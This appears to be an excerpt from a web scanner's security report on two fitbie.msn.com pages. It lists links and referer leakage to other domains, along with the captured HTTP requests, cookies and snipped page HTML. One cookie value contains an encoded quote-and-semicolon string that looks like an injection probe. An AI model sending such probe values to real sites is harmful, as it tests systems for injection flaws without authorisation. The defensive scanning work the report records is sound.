http://digg.com/submit?url=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002
http://images.rodale.com/dca/400Cal-navButton.gif
http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg
http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://online.prevention.com/topdvds/index.html?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Reasons%20to%20get%20off%20the%20couch
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://twitter.com/home?status=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Fget-fit%2Fanytime-anywhere-yoga&linkname=Anytime%2C%20Anywhere%20Yoga%20%7C%20Fitbie
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;
http://www.facebook.com/sharer.php?u=/get-fit/anytime-anywhere-yoga?gt1=50002
http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002
http://www.myhomemsn.com/
http://www.prevention.com/
http://www.prevention.com/7weightlossmistakes/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-7%20Mistakes%20Healthy%20Eaters%20Make%20RL
http://www.prevention.com/couchpotatoworkout/?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-The%20Coach-Potato%20Workout%20RL
http://www.prevention.com/health/fitness/no-cat/yoga-poses/article/e583d08f88803110VgnVCM20000012281eac____
http://www.prevention.com/health/fitness/yoga/10-yoga-poses-for-a-cover-model-body/article/0638a6b509787110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Yoga%20poses%20for%20a%20model%20worthy%20body
http://www.prevention.com/health/fitness/yoga/beginner-yoga-poses/article/6b33d08f88803110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-Tips%20for%20yoga%20beginners
http://www.prevention.com/health/fitness/yoga/omm-away-the-years/article/8f3d9fb29034c110VgnVCM10000013281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-15%20Minute%20yoga%20routine%20to%20fight%20pain%20and%20boost%20energy
http://www.prevention.com/totalbodytoning/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-6%20Moves%20to%20Tone%20Your%20Entire%20Body%20RL
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false
https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine
https://shop.fitbie.com/

Request

GET /get-fit/anytime-anywhere-yoga?gt1=50002 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:09 +0000
ETag: "1297607169-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42937
Expires: Mon, 14 Feb 2011 02:26:10 GMT
Date: Sun, 13 Feb 2011 14:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99¢ an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go ></a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/get-fit/anytime-anywhere-yoga?gt1=50002" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
</span>
       <a href="http://www.prevention.com/"> <img src="/sites/all/themes/fitlife/images/brandlogos/prevention.png" alt="prevention" />
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/beginner-yoga-poses/article/6b33d08f88803110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-Tips%20for%20yoga%20beginners" target="_blank"><strong>
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/10-yoga-poses-for-a-cover-model-body/article/0638a6b509787110VgnVCM20000012281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Yoga%20poses%20for%20a%20model%20worthy%20body" target="_blank"><strong>
...[SNIP]...
<p><a href="http://www.prevention.com/health/fitness/yoga/omm-away-the-years/article/8f3d9fb29034c110VgnVCM10000013281eac____?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-15%20Minute%20yoga%20routine%20to%20fight%20pain%20and%20boost%20energy" target="_blank"><strong>
...[SNIP]...
<p><a href="http://online.prevention.com/topdvds/index.html?cm_mmc=Fit_Life-_-Anytime%20anywhere%20yoga-_-Article-_-10%20Reasons%20to%20get%20off%20the%20couch" target="_blank"><strong>
...[SNIP]...
</div>
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Fget-fit%2Fanytime-anywhere-yoga&linkname=Anytime%2C%20Anywhere%20Yoga%20%7C%20Fitbie" id="da2a_1"> </a>
...[SNIP]...
<h5>More From
<a href="http://www.prevention.com/health/fitness/no-cat/yoga-poses/article/e583d08f88803110VgnVCM20000012281eac____" alt="Anywhere, Anytime Yoga" target="_new"><img src="/sites/all/themes/fitlife/images/brandlogos/prevention.png" alt="prevention" />
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/couchpotatoworkout/?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-The%20Coach-Potato%20Workout%20RL" target="_new" title="The Coach-Potato Workout">The Coach-Potato Workout</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/totalbodytoning/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-6%20Moves%20to%20Tone%20Your%20Entire%20Body%20RL" target="_new" title="6 Moves to Tone Your Entire Body">6 Moves to Tone Your Entire Body</a>
...[SNIP]...
<li class="more-from-link">
<a href="http://www.prevention.com/7weightlossmistakes/index.shtml?cm_mmc=Fit_Life-_-Anywhere%20Anytime%20Yoga-_-Article-_-7%20Mistakes%20Healthy%20Eaters%20Make%20RL" target="_new" title="7 Mistakes Healthy Eaters Make">7 Mistakes Healthy Eaters Make</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/get-fit/anytime-anywhere-yoga?gt1=50002">Digg</a></li>
<li class="share">
       <a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Fget-fit%2Fanytime-anywhere-yoga&linkname=Anytime%2C%20Anywhere%20Yoga%20%7C%20Fitbie" id="da2a_1"> Share</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/getfit;kw=;slot=300x250.1;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/getfit;topic=yoga;sbtpc=anytimeanywhereyoga;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>   <a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>    <a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.2. http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/12-ways-make-water-less-boring

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/fitbie/eatright;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?
http://ad.doubleclick.net/jump/fitbie/eatright;kw=slideshow;slot=300x250.1;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?
http://advertising.microsoft.com/msn/
http://digg.com/submit?url=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005
http://images.rodale.com/dca/400Cal-navButton.gif
http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg
http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://twitter.com/home?status=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005&layout=button_count&show_faces=false&action=like&colorscheme=light;
http://www.facebook.com/sharer.php?u=/slideshow/12-ways-make-water-less-boring?gt1=50005
http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005
http://www.myhomemsn.com/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false
https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine
https://shop.fitbie.com/

Request

GET /slideshow/12-ways-make-water-less-boring?gt1=50005 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:37 +0000
ETag: "1297607197-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42929
Expires: Mon, 14 Feb 2011 02:26:39 GMT
Date: Sun, 13 Feb 2011 14:31:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
<a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99¢ an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
